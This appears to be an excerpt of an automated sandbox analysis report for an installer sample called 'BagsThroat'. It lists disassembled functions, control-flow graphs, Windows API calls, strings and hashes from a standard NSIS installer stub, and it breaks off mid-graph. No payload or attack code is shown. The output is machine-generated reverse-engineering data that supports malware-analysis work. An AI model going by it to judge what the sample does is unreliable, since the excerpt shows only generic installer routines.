                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                        APIs
                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                        • ShowWindow.USER32(?), ref: 00401753
                                        • ShowWindow.USER32(?), ref: 00401767
                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                        Strings
                                        • Rename failed: %s, xrefs: 0040194B
                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                        • Rename: %s, xrefs: 004018F8
                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                        • Aborting: "%s", xrefs: 0040161D
                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                        • Jump: %d, xrefs: 00401602
                                        • detailprint: %s, xrefs: 00401679
                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                        • Rename on reboot: %s, xrefs: 00401943
                                        • SetFileAttributes failed., xrefs: 004017A1
                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                        • BringToFront, xrefs: 004016BD
                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                        • Sleep(%d), xrefs: 0040169D
                                        • Call: %d, xrefs: 0040165A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                        • API String ID: 2872004960-3619442763
                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                        Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                        • ShowWindow.USER32(?), ref: 004054FE
                                        • DestroyWindow.USER32 ref: 00405512
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                        • EnableWindow.USER32(?,?), ref: 00405783
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                        • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                        Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                        APIs
                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 608394941-2746725676
                                        • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                        • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • lstrcatW.KERNEL32(00000000,00000000,176,004D70B0,00000000,00000000), ref: 00401A76
                                        • CompareFileTime.KERNEL32(-00000014,?,176,176,00000000,00000000,176,004D70B0,00000000,00000000), ref: 00401AA0
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                        • String ID: 176$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                        • API String ID: 4286501637-885536709
                                        • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                        • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                        Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 653 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 656 403603-403608 653->656 657 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 653->657 658 4037e2-4037e6 656->658 665 403641 657->665 666 403728-403736 call 4032d2 657->666 668 403646-40365d 665->668 672 4037f1-4037f6 666->672 673 40373c-40373f 666->673 670 403661-403663 call 403336 668->670 671 40365f 668->671 677 403668-40366a 670->677 671->670 672->658 675 403741-403759 call 403368 call 403336 673->675 676 40376b-403795 GlobalAlloc call 403368 call 40337f 673->676 675->672 704 40375f-403765 675->704 676->672 702 403797-4037a8 676->702 680 403670-403677 677->680 681 4037e9-4037f0 call 4032d2 677->681 682 4036f3-4036f7 680->682 683 403679-40368d call 405e38 680->683 681->672 689 403701-403707 682->689 690 4036f9-403700 call 4032d2 682->690 683->689 700 40368f-403696 683->700 693 403716-403720 689->693 694 403709-403713 call 4072ad 689->694 690->689 693->668 701 403726 693->701 694->693 700->689 706 403698-40369f 700->706 701->666 707 4037b0-4037b3 702->707 708 4037aa 702->708 704->672 704->676 706->689 709 4036a1-4036a8 706->709 710 4037b6-4037be 707->710 708->707 709->689 711 4036aa-4036b1 709->711 710->710 712 4037c0-4037db SetFilePointer call 405e38 710->712 711->689 713 4036b3-4036d3 711->713 716 4037e0 712->716 713->672 715 4036d9-4036dd 713->715 717 4036e5-4036ed 715->717 718 4036df-4036e3 715->718 716->658 717->689 719 4036ef-4036f1 717->719 718->701 718->717 719->689
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004035C4
                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                        Strings
                                        • Null, xrefs: 004036AA
                                        • Error launching installer, xrefs: 00403603
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                        • soft, xrefs: 004036A1
                                        • Inst, xrefs: 00403698
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 4283519449-527102705
                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 720 40337f-403398 721 4033a1-4033a9 720->721 722 40339a 720->722 723 4033b2-4033b7 721->723 724 4033ab 721->724 722->721 725 4033c7-4033d4 call 403336 723->725 726 4033b9-4033c2 call 403368 723->726 724->723 730 4033d6 725->730 731 4033de-4033e5 725->731 726->725 732 4033d8-4033d9 730->732 733 403546-403548 731->733 734 4033eb-403432 GetTickCount 731->734 737 403567-40356b 732->737 735 40354a-40354d 733->735 736 4035ac-4035af 733->736 738 403564 734->738 739 403438-403440 734->739 740 403552-40355b call 403336 735->740 741 40354f 735->741 742 4035b1 736->742 743 40356e-403574 736->743 738->737 744 403442 739->744 745 403445-403453 call 403336 739->745 740->730 753 403561 740->753 741->740 742->738 748 403576 743->748 749 403579-403587 call 403336 743->749 744->745 745->730 754 403455-40345e 745->754 748->749 749->730 757 40358d-40359f WriteFile 749->757 753->738 756 403464-403484 call 4076a0 754->756 763 403538-40353a 756->763 764 40348a-40349d GetTickCount 756->764 759 4035a1-4035a4 757->759 760 40353f-403541 757->760 759->760 762 4035a6-4035a9 759->762 760->732 762->736 763->732 765 4034e8-4034ec 764->765 766 40349f-4034a7 764->766 767 40352d-403530 765->767 768 4034ee-4034f1 765->768 769 4034a9-4034ad 766->769 770 4034af-4034e0 MulDiv wsprintfW call 404f9e 